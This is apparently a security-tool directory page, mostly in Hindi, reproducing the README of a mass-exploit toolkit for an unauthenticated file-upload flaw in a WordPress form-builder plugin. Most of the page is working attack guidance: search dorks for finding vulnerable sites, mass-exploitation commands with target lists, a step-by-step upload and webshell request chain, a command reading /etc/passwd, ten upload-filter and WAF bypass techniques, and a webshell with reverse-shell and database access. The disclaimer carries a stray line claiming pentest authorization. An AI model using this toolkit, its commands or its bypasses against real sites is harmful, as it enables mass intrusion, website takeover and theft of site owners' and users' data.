Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5524-PoC — CVE-2026-5524 के लिए Python मास-एक्सप्लॉइट टूलकिट, जो WordPress Divi Form Builder प्लगइन में एक अनऑथेंटिकेटेड फ़ाइल अपलोड RCE है, जिसमें webshell अपलोड और कमांड निष्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/iicaicai/cve-2026-5524-poc
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटरिमोट एक्सेस ट्रोजन
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

CVE-2026-5524 के लिए Python मास-एक्सप्लॉइट टूलकिट, जो WordPress Divi Form Builder प्लगइन में एक अनऑथेंटिकेटेड फ़ाइल अपलोड RCE है, जिसमें webshell अपलोड और कमांड निष्पादन शामिल है।

रिपॉजिटरी देखें

CVE-2026-5524 — Divi Form Builder अनधिकृत RCE

CVE-2026-5524 के लिए मास एक्सप्लॉइट टूलकिट, जो WordPress प्लगइन Divi Form Builder <= 5.1.8 में एक अनधिकृत मनमाना फ़ाइल अपलोड भेद्यता है जो रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाती है।

version Devon Aji python telegram

FieldValue
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedDivi Form Builder <= 5.1.8
Patched5.1.9
TypeUnauthenticated File Upload to RCE
Researcher0xd4rk5id3 - EnvoraSec

Contents

  • Description
  • Dorks
  • Installation
  • Usage
    • Single target
    • Mass exploit
    • Advanced bypass
    • Command execution
  • Vulnerability details
  • Bypass techniques
  • Tech stack
  • Project structure
  • Attack flow
  • Disclaimer

Description

WordPress के लिए Divi Form Builder प्लगइन में एक अनधिकृत मनमाना फ़ाइल अपलोड भेद्यता है। do_image_upload() हैंडलर उपयोगकर्ता-नियंत्रित acceptFileTypes POST पैरामीटर को सीधे फ़ाइल एक्सटेंशन को मान्य करने के लिए उपयोग किए जाने वाले रेगुलर एक्सप्रेशन में पास करता है। phtml जैसा मान प्रदान करके, एक हमलावर प्लगइन के .htaccess नियम को बायपास कर सकता है जो केवल .php एक्सटेंशन को ब्लॉक करता है और PHP-निष्पादन योग्य एक्सटेंशन (.phtml, .phar, .php5, .php7, और समान) के साथ एक वेबशेल अपलोड कर सकता है।

एक बार फ़ाइल /wp-content/uploads/de_fb_uploads/ में पहुँच जाने के बाद, Apache इसे PHP के रूप में निष्पादित करता है, जिससे हमलावर को वेब सर्वर उपयोगकर्ता के रूप में रिमोट कोड एक्ज़ीक्यूशन प्राप्त होता है।

यह समस्या Divi Form Builder 5.1.9 में ठीक कर दी गई है।


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

Installation

आवश्यकताएँ: Linux, macOS, या WSL पर Python 3.8 या नया।

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Usage

Single target

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

Mass exploit

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Advanced bypass

WAF (NinjaFirewall, Wordfence, ModSecurity) के पीछे या कठोर Apache या nginx कॉन्फ़िगरेशन वाले लक्ष्यों के लिए।

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Command execution

सफल अपलोड के बाद, स्क्रिप्ट तुरंत एक कमांड निष्पादित कर सकती है या इंटरैक्टिव शेल में प्रवेश कर सकती है।

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Flags


Vulnerability details

Vulnerable code

भेद्य हैंडलर बिना सैनिटाइज़ेशन के उपयोगकर्ता इनपुट से एक regex बनाता है।

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

acceptFileTypes=phtml भेजकर, परिणामी regex /\.(phtml)$/i .phtml में समाप्त होने वाले फ़ाइलनामों से मेल खाता है, भले ही प्लगइन की अपनी .htaccess फ़ाइल केवल .php एक्सटेंशन को ब्लॉक करती है। Apache तब अपलोड की गई फ़ाइल को PHP के रूप में निष्पादित करता है, जिससे रिमोट कोड एक्ज़ीक्यूशन उत्पन्न होता है।

Confirmed attack chain

  1. उस पृष्ठ को क्रॉल करें जिसमें Divi Form Builder फ़ॉर्म एम्बेड है (/, /contact, /quote, आदि)। Varnish, WP Rocket, और अन्य पृष्ठ कैश को हराने के लिए ?nocache=<random> पैरामीटर जोड़ें जो अन्यथा एक पुराना nonce प्रदान करेंगे।

  2. स्थानीयकृत JavaScript ऑब्जेक्ट से fb_nonce मान निकालें:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. /wp-admin/admin-ajax.php पर एक multipart फ़ॉर्म POST करें:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. JSON प्रतिक्रिया से फ़ाइल URL पढ़ें:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. base64 एन्कोडेड कमांड के साथ शेल का अनुरोध करें:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Bypass techniques

स्क्रिप्ट प्रत्येक तकनीक को प्राथमिकता क्रम में आज़माती है और, जब --aggressive सेट होता है, तो पहले अपलोड के सफलता की रिपोर्ट के बाद भी प्रत्येक को आज़माती है।


Tech stack

Exploit script

Custom shell (bypass.phtml)


Project structure

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Main exploit script
|-- bypass.phtml              16 KB multi-layer PHP webshell
|-- htaccess_enable.phtml     Dropper that writes a re-enabling .htaccess
|-- user_ini.phtml            Dropper that writes a .user.ini for PHP-FPM
|-- targets.txt               Example target list
|-- pwned.jsonl               Generated by the -o flag during mass scans
|-- requirements.txt          Python dependencies
`-- README.md                 This document

Attack flow

root@kitploit:~
+--------------------------------------------------+
| 1. Recon                                         |
|    GET /?nocache=<random>                        |
|    Parse fb_nonce from de_fb_obj                 |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Craft exploit                                 |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Server accepts and stores file                |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Execute                                       |
|    GET shell.phtml?x=base64(command)             |
|    Remote code execution achieved                |
+--------------------------------------------------+

Disclaimer

यह टूल शैक्षिक उद्देश्यों के लिए और अधिकृत पेनेट्रेशन टेस्टिंग एंगेजमेंट के दौरान उपयोग के लिए प्रदान किया गया है। स्वीकार्य उपयोग के उदाहरणों में शामिल हैं:

  • बग बाउंटी कार्यक्रम जो स्पष्ट रूप से लक्ष्य के परीक्षण को अधिकृत करते हैं
  • कैप्चर द फ्लैग प्रतियोगिताएँ और समर्पित लैब वातावरण
  • परिसंपत्ति स्वामी से लिखित अनुमति के साथ आंतरिक सुरक्षा आकलन
  • नियंत्रित सेटिंग में आयोजित शैक्षणिक सुरक्षा अनुसंधान

उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, लगभग हर क्षेत्राधिकार में अवैध है और सख्ती से निषिद्ध है। लेखक इस कोड के दुरुपयोग का समर्थन नहीं करता और न ही इसकी जिम्मेदारी लेता है।

J'ai la permission et je suis autorisé à effectuer ce pentest. (I have permission and I am authorized to perform this pentest.)

संभावित प्रासंगिक कानूनों में इंडोनेशिया का UU ITE, संयुक्त राज्य अमेरिका का Computer Fraud and Abuse Act, यूरोपीय संघ Cybercrime Convention, और अन्यत्र समकक्ष कानून शामिल हैं। संदेह होने पर, पहले लिखित प्राधिकरण प्राप्त करें।


License

केवल शैक्षिक उपयोग। उपयोग की पूरी शर्तों के लिए disclaimer अनुभाग देखें।

टूल डाउनलोड करें
FlagDescription
-u URLएकल लक्ष्य URL
-l FILEलक्ष्य सूची वाली फ़ाइल, प्रति पंक्ति एक URL
-t Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट 10)
--timeout Nसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट 15)
-o FILEपरिणामों को JSONL आउटपुट फ़ाइल में सहेजें
--proxy URLHTTP प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें
--nonce HASHमैन्युअल रूप से प्रदान किया गया nonce उपयोग करें, ऑटोडिटेक्शन छोड़ें
--ext EXTपूरी बायपास सूची के बजाय एकल एक्सटेंशन बाध्य करें
--shellसफलता पर इंटरैक्टिव RCE शेल में प्रवेश करें (केवल एकल लक्ष्य)
--cmd CMDलक्ष्य पर एक कमांड निष्पादित करें, फिर बाहर निकलें
--shell-file FILEअंतर्निहित के बजाय कस्टम शेल पेलोड अपलोड करें
--no-verifyअपलोड के बाद RCE सत्यापन चरण छोड़ें
--strict-verifyझूठे सकारात्मक को फ़िल्टर करने के लिए पुष्टि करें कि शेल URL HTTP 200 लौटाता है
--user-iniPHP-FPM वातावरण के लिए .user.ini ड्रॉपर अपलोड करें
--htaccessApache वातावरण के लिए .htaccess पुनः-सक्षमकर्ता अपलोड करें
--aggressiveप्रत्येक उपलब्ध बायपास तकनीक सक्षम करें
--null-bytenull byte और डबल एक्सटेंशन प्रयास शामिल करें
--path-traversal/uploads/YYYY/MM/ उपनिर्देशिकाओं में अपलोड करने का प्रयास करें
--debugनिदान के लिए कच्ची HTTP प्रतिक्रियाएँ प्रिंट करें
#TechniqueTargets
1वैकल्पिक PHP एक्सटेंशन .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlप्लगइन .htaccess नियम जो केवल .php को ब्लॉक करता है
2केस भिन्नता .PHTML, .PHP5, .PhTmLकेस-संवेदनशील WAF हस्ताक्षर (NinjaFirewall)
3डबल एक्सटेंशन .phtml.jpg, .php.jpgApache mod_mime कंटेंट-नेगोशिएशन विचित्रताएँ
4Null byte .php%00.jpg, .phtml%00.txtपुराने PHP संस्करण (5.3.4 से कम) और कुछ पार्सर
5अनुगामी स्थान या बिंदु .php , .php.Windows IIS और पुराने Apache संस्करण
6Content-Type स्पूफिंग application/octet-streamWAF जो multipart Content-Type हेडर पर कुंजी करते हैं
7एक वास्तविक .htaccess अपलोड करें जो .gif, .png, .jpg, .txt, .html, आदि के लिए PHP पुनः सक्षम करता हैAllowOverride All वाले Apache सर्वर
8auto_prepend_file के साथ एक .user.ini अपलोड करेंPHP-FPM वातावरण
9multipart boundary हेरफेर के माध्यम से फ़ाइलनाम इंजेक्शनप्रॉक्सी और WAF जो अनुरोध बॉडी को पुनः पार्स करते हैं
10फ़ाइलनाम में पथ ट्रैवर्सल ../shell.phtmlप्लगइन निर्देशिका प्रतिबंध
ComponentTechnology
LanguagePython 3.8+
HTTP clientrequests
TLS handlingस्व-हस्ताक्षरित प्रमाणपत्रों के लिए असुरक्षित मोड में urllib3
Concurrencyमास स्कैनिंग के लिए concurrent.futures.ThreadPoolExecutor
Parsingnonce निष्कर्षण के लिए re, प्रतिक्रिया प्रबंधन के लिए json
Encodingवेबशेल कमांड पैरामीटर के लिए base64
CLI19 कॉन्फ़िगर करने योग्य फ़्लैग के साथ argparse
ComponentTechnology
LanguagePHP 7.0+
Execution functionssystem(), shell_exec(), proc_open(), passthru(), popen()
Front endसादा HTML फ़ॉर्म, कोई JavaScript फ़्रेमवर्क नहीं
Featuresफ़ाइल ब्राउज़र, कमांड निष्पादन, डेटाबेस एक्सेस, रिवर्स शेल, स्व-इंस्टॉलिंग .htaccess और .user.ini
Sizeलगभग 16 KB
Bypass layersछह स्वतंत्र निष्पादन पथ और एन्कोडेड पेलोड